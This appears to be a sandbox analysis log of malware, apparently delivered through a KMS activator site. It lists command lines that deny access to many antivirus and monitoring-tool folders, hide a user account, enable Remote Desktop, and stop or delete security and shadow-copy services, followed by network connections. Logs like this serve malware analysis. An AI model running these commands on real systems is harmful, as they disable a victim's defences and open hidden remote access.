C:\Windows\system32\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\system32\timeout.exe

timeout 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)

C:\Windows\SysWOW64\unsecapp.exe

"C:\Windows\SysWOW64\unsecapp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\system32\sc.exe

sc delete swprv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\system32\sc.exe

sc stop mbamservice

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\system32\sc.exe

sc stop bytefenceservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\system32\sc.exe

sc delete bytefenceservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\system32\sc.exe

sc delete mbamservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\system32\sc.exe

sc delete crmsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat

C:\Windows\system32\timeout.exe

timeout 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe

C:\Windows\SysWOW64\unsecapp.exe

"C:\Windows\SysWOW64\unsecapp.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 kms-auto.site udp
US 8.8.8.8:53 kms-auto.site udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 150.171.28.11:80 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site tcp
US 172.67.212.241:443 kms-auto.site tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 172.67.212.241:443 kms-auto.site tcp
US 8.8.8.8:53 cdn.gtranslate.net udp
US 8.8.8.8:53 cdn.gtranslate.net udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
US 104.26.13.42:443 cdn.gtranslate.net tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 77.88.21.119:443 mc.yandex.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
NL 108.177.119.94:443 update.googleapis.com tcp
GB 2.18.66.168:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
N/A 224.0.0.251:5353 udp
GB 2.18.66.168:443 www.bing.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
RU 87.250.251.119:443 mc.yandex.com tcp
RU 87.250.251.119:443 mc.yandex.com tcp
US 8.8.8.8:53 b-wpi.ru udp
US 8.8.8.8:53 b-wpi.ru udp
NL 46.21.250.137:443 b-wpi.ru tcp
NL 46.21.250.137:443 b-wpi.ru tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
